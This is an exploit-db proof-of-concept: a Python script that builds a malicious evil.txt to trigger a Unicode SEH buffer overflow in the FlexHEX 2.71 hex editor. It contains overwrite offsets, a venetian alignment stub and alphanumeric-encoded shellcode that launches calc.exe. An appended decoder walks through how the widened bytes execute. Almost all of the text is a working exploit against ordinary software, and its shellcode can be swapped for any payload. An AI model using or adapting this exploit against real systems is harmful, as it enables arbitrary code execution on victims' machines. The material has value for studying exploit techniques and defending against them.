FlexHEX 2.71 – SEH Buffer Overflow (Unicode)

  • Author: Chris Au
    Date: 2019-04-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46665/
#!/usr/bin/env python
#
# Exploit Author: Chris Au
# Exploit Title: FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode)
# Date: 06-04-2019
# Vulnerable Software: FlexHEX 2.71
# Vendor Homepage: http://www.flexhex.com
# Version: 2.71
# Software Link: http://www.flexhex.com/download/flexhex_setup.exe
# Tested on: Windows XP SP3
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open FlexHEX Editor
# 3. select "Stream", click "New Stream..."
# 4. paste contents from clipboard in the "Stream Name:" field
# 5. select OK
# 6. calc.exe
#
# The dialog widens the pasted ANSI string to UTF-16, so every byte below
# lands on the stack as (byte, 0x00). Offsets are given in narrow bytes and
# double in memory: the 276-byte junk becomes 552 bytes before the SEH record.

filename = "evil.txt"

# filler up to the SEH record
junk = b"\xcc" * 276
# nSEH, widened to 90 00 45 00: nop ; add byte ptr [ebp], al
nseh = b"\x90\x45"
# SEH, widened to 0x005200d5: pop pop retn (Unicode-compatible address, no high bytes)
seh = b"\xd5\x52"
# Venetian stub: every single-byte opcode is followed by \x45 so that the
# interleaved 00 bytes decode as the harmless "add byte ptr [ebp], al"
valign = (
    b"\x45"          # align
    b"\x56"          # push esi
    b"\x45"          # align
    b"\x58"          # pop eax
    b"\x45"          # align
    b"\x05\x20\x11"  # add eax, 0x11002000
    b"\x45"          # align
    b"\x2d\x1a\x11"  # sub eax, 0x11001a00 (net: eax = esi + 0x600)
    b"\x45"          # align
    b"\x50"          # push eax
    b"\x45"          # align
    b"\xc3"          # retn, lands on eax
)
# Unicode-safe NOP sled (inc ebp) into the shellcode
nop = b"\x45" * 94
# calc.exe, alphanumeric Unicode-mixed encoding, BufferRegister=EAX
shellcode = (
    b"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
    b"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
    b"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
    b"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
    b"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
    b"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
    b"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
    b"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
    b"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
    b"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
    b"Lnc51hOuipAA"
)
fill = b"\x45" * 5000
buffer = junk + nseh + seh + valign + nop + shellcode + fill

# write raw bytes so that Python 3 does not re-encode \xcc, \x90 and \xd5
with open(filename, "wb") as textfile:
    textfile.write(buffer)
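To see what the CPU actually executes once the dialog has widened the pasted string, here is an added example that is not part of the original exploit-db entry: it models the ANSI-to-UTF-16 expansion, reads back the nSEH/SEH values that land on the SEH record, and decodes the bytes from nSEH onward with a minimal x86 decoder covering only the opcodes this stub relies on. The layout constants are copied from the PoC; the assumption that the widening is an identity mapping for the high bytes 0xcc, 0xd5 and 0x90 (true for a cp1252 ANSI code page) is mine, as are the function names.

```python
import struct

# Layout constants copied from the PoC (narrow bytes, before widening).
JUNK = b"\xcc" * 276
NSEH = b"\x90\x45"
SEH = b"\xd5\x52"
VALIGN = b"\x45\x56\x45\x58\x45\x05\x20\x11\x45\x2d\x1a\x11\x45\x50\x45\xc3"

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]


def expand_unicode(narrow):
    """Model the dialog's ANSI -> UTF-16LE widening: every byte becomes (byte, 0x00).

    Assumption: the ANSI code page is cp1252, which maps 0xcc, 0xd5 and 0x90 to
    U+00CC, U+00D5 and U+0090, so the high bytes used by the PoC survive unchanged.
    """
    return b"".join(bytes([b, 0]) for b in narrow)


def seh_frame(junk_len=len(JUNK)):
    """Return (nSEH, SEH) as the 32-bit values that overwrite the SEH record."""
    widened = expand_unicode(JUNK + NSEH + SEH)
    return struct.unpack_from("<II", widened, junk_len * 2)


def disassemble(code):
    """Minimal x86-32 decoder for the handful of opcodes this stub relies on.

    Returns the instruction stream from offset 0 up to and including the first
    'ret'. Anything outside the modelled subset raises on purpose: an unexpected
    opcode means the Unicode alignment trick has been broken.
    """
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if op == 0x00:                      # add r/m8, r8: what the 0x00 padding becomes
            modrm = code[i + 1]
            mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
            if mod != 1 or rm == 4:         # only [reg+disp8] without SIB is modelled
                raise ValueError("unmodelled modrm 0x%02x at offset %d" % (modrm, i))
            out.append("add byte ptr [%s+0x%02x], %s" % (REG32[rm], code[i + 2], REG8[reg]))
            i += 3
        elif op in (0x05, 0x2d):            # add/sub eax, imm32
            imm = struct.unpack_from("<I", code, i + 1)[0]
            out.append("%s eax, 0x%08x" % ("add" if op == 0x05 else "sub", imm))
            i += 5
        elif op == 0x90:
            out.append("nop")
            i += 1
        elif op == 0xd5:                    # aad imm8: the SEH address's low byte
            out.append("aad 0x%02x" % code[i + 1])
            i += 2
        elif 0x40 <= op <= 0x47:
            out.append("inc %s" % REG32[op - 0x40])
            i += 1
        elif 0x50 <= op <= 0x57:
            out.append("push %s" % REG32[op - 0x50])
            i += 1
        elif 0x58 <= op <= 0x5f:
            out.append("pop %s" % REG32[op - 0x58])
            i += 1
        elif op == 0xc3:
            out.append("ret")
            break
        else:
            raise ValueError("unmodelled opcode 0x%02x at offset %d" % (op, i))
    return out


def eax_delta(insns):
    """Net change the add/sub eax, imm32 instructions apply to EAX (mod 2**32)."""
    delta = 0
    for insn in insns:
        mnem, _, rest = insn.partition(" ")
        if rest.startswith("eax, 0x"):
            imm = int(rest.split("0x")[1], 16)
            delta += imm if mnem == "add" else -imm
    return delta & 0xffffffff


def stub_trace():
    """Instruction stream starting at nSEH, once pop/pop/ret has returned into it."""
    return disassemble(expand_unicode(NSEH + SEH + VALIGN))


if __name__ == "__main__":
    print("nSEH=0x%08x SEH=0x%08x" % seh_frame())
    trace = stub_trace()
    for insn in trace:
        print(insn)
    print("eax = esi + 0x%x" % eax_delta(trace))
```

The trace makes the alignment rule visible: execution falls through nSEH (nop; add byte ptr [ebp], al) into the SEH address bytes themselves (aad 0x00; push edx), and the trailing 0x00 of the address swallows the stub's leading \x45 as a modrm byte. That is why the stub opens with an "align" byte rather than with push esi, and why every single-byte opcode in it is followed by another \x45: each 00 45 00 triple decodes as a harmless add to [ebp] and keeps the real instructions on the right parity. Remove one align byte and disassemble() raises, which is the same failure the CPU would hit with a garbage instruction.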